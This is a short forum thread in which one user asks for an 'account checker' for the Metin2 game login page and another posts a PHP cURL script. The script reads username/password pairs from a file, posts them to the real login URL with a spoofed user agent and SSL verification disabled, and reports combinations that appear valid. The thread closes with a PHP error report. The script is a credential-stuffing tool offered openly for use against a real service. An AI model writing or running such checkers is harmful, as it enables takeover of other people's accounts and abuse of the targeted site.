Login Register






Account Checker with URL? filter_list
Author
Message
Account Checker with URL? #1
G'Day,
can someone create a account checker for sites to login?
Sample:
Name of Accountfield: Benutzername
Name of Passwordfield: Passwort
URL: http://www.metin2.de/user/login
Load Accountlist: account.txt

thanks (:

Reply

RE: Account Checker with URL? #2
I'm sure you'll need to input the submit field name too.
Well, I've made a PHP script to do exactly what you're asking for.
PHP Code:
<?php $fileh = @fopen('account.txt','r'); $flag = 0; if($user_pass = fgets($fileh)) { $arr = explode(', ',$user_pass); $username = $arr[0]; $password = $arr[1]; $url = "http://www.metin2.de/user/login"; $agent= 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0'; $post_fields = 'Benutzername='.$username.'&Passwort='.$password.'&login=Login'; $reffer = "http://www.metin2.de"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_VERBOSE, true); curl_setopt($ch, CURLOPT_REFERER, $reffer); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $agent); $result = curl_exec($ch); curl_close($ch); if(!strstr($result, 'error') && !strstr($result, 'wrong') && !strstr($result, 'invalid')) { $flag = 1; echo 'This is probably a valid combination : Username : '.$username.' Passrord : '.$password.'<br />'; } } if($flag == 0) { echo 'No valid combinations found'; } fclose($fileh); ?>

Keep in mind that the account.txt file is in the same directory as that of the php file. And, the contents in the account.txt file should be in this format :
Code:
username1, password1 username2, password2 username3, password3 and so on...
[Image: 2YpkRjy.png]
PM me if you need help.
My pastebin HERE. My URL Shortener HERE.

Reply

RE: Account Checker with URL? #3
Thank you very mutch *-*
i test it now *-*

Fatal error: Call to undefined function gets() in /users/x/www/de/index.php on line 4

Reply